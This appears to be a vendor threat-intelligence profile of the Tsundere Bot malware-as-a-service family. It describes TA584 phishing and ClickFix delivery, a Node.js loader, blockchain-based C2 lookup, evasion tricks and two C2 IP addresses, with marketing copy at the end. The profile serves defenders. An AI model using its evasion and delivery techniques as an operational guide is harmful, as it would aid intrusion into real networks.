Tsundere Bot
Tsundere Bot is a malware-as-a-service (MaaS) platform with backdoor and loader capabilities, observed in campaigns attributed to the initial access broker TA584 (tracked by Proofpoint since 2020) and first delivered by TA584 in late November 2025. It has been used alongside the XWorm remote access trojan to obtain network access assessed as potentially enabling follow-on ransomware activity.
Delivery/infection chain (as reported): TA584 uses email-led phishing from compromised aged accounts (including via SendGrid and Amazon SES) with per-target unique URLs, geofencing and IP filtering, and redirect chains via traffic direction systems (e.g., Keitaro). Victims who pass filtering are presented with CAPTCHA and “ClickFix” social-engineering pages that instruct them to run a PowerShell command. The PowerShell retrieves and executes an obfuscated script that loads Tsundere Bot (or XWorm) into memory.
Execution/architecture and capabilities: Tsundere Bot requires Node.js; installers generated from its C2 panel can add Node.js to victim systems. The infection chain described includes decrypting AES-encrypted Node.js components where a loader executes the Tsundere Bot component. Reported functionality includes collecting system information/profiling, executing arbitrary code (including arbitrary JavaScript received from C2), using infected hosts as SOCKS proxies, and installing additional payloads. It also includes a locale check and aborts execution on CIS-language systems.
C2 and evasion: Tsundere Bot retrieves C2/configuration from the Ethereum blockchain using an EtherHiding-like technique (via Web3 smart contracts), complicating takedown and detection; it then communicates with C2 over WebSockets. A hardcoded fallback C2 is reported in the installer. Reported network indicators in the content include C2 193.17.183.126:3001, and an additional Tsundere Bot C2 listed as 85.236.25.119.
Attribution/associations: Kaspersky is cited as first documenting Tsundere Bot and attributing it to a Russian-speaking operator linked to 123 Stealer. Proofpoint assesses TA584 is likely connected to the Russian cybercriminal ecosystem/underground markets and that TA584 activity overlaps with a cluster tracked as Storm-0900.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
TA584 has been observed employing the Tsundere Bot in conjunction with the XWorm remote access trojan... This command loads either XWorm or Tsundere Bot into memory. Tsundere Bot, a malware-as-a-service platform, gathers system information, can execute arbitrary code, and uses the Ethereum blockchain to retrieve its command-and-control address.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 techniqueInitial Access
3 techniques"The malware targets organizations globally through carefully crafted phishing emails that impersonate trusted brands and government agencies, tricking victims into executing malicious commands."
“The currently prevalent attack chain begins with emails sent from hundreds of compromised, aged accounts… The emails include unique URLs for each target…”
“The currently prevalent attack chain begins with emails sent from hundreds of compromised, aged accounts, delivered via SendGrid and Amazon Simple Email Service (SES). The emails include unique URLs for each target…”
Execution
4 techniques"This command loads either XWorm or Tsundere Bot into memory."
"...followed by a ClickFix page instructing them to execute a PowerShell command."
“Those who pass the filters will land on a CAPTCHA page, followed by a ClickFix page instructing the target to run a PowerShell command on their system.”
Stealth
5 techniques“The command fetches and executes an obfuscated script…”
“TA584 sends emails impersonating various organizations… Brand impersonation further reinforces this approach… localized or regionally relevant brands used to increase credibility…”
"then decrypts two AES-encrypted Node.js files embedded within the payload."
“The emails usually contain unique links for each target that performs geofencing and IP filtering. If these checks were passed, the recipient is redirected…”
"This command loads either XWorm or Tsundere Bot into memory."
Discovery
3 techniques"Tsundere Bot... gathers system information..."
“The emails usually contain unique links for each target that performs geofencing and IP filtering. If these checks were passed, the recipient is redirected…”
“…includes logic to check the system locale, aborting execution if the system is using Commonwealth of Independent States (CIS) country languages…”
Command and Control
7 techniques"Once installed, Tsundere Bot connects to its command-and-control server at 193.17.183.126:3001"
“It communicates with its C2 servers over WebSockets…”
“…supports using infected hosts as SOCKS proxies.”
“…supports using infected hosts as SOCKS proxies.”
"...uses the Ethereum blockchain to retrieve its command-and-control address."
“The command fetches and executes an obfuscated script… [and Tsundere Bot can be used] …to install additional payloads.”
“The malware retrieves its command-and-control (C2) address from the Ethereum blockchain using a variant of the EtherHiding technique…”
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Newly adopted malware in TA584 campaigns used alongside XWorm to support initial access and persistence, assessed as part of activity that can lead to follow-on ransomware attacks.
A newly reported TA584-associated malware used for stealthy, persistent access. It uses Windows Registry autorun persistence with null-terminator injection to hide the Run key from common enumeration tools, executes an mshta→VBScript→hidden PowerShell chain at boot, and retrieves its payload dynamically from an external IP each startup to remain modular and largely fileless.
Malware-as-a-service backdoor/loader distributed by TA584 from late Nov 2025 alongside XWorm; uses Ethereum blockchain-based C2 discovery (via multiple RPC providers) and then WebSocket C2; requires Node.js (installer can fetch/install it); performs locale checks and exits on CIS-language locales.
Malware-as-a-service platform used for initial access; collects system information, supports arbitrary code execution, and leverages the Ethereum blockchain to obtain its C2 address.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.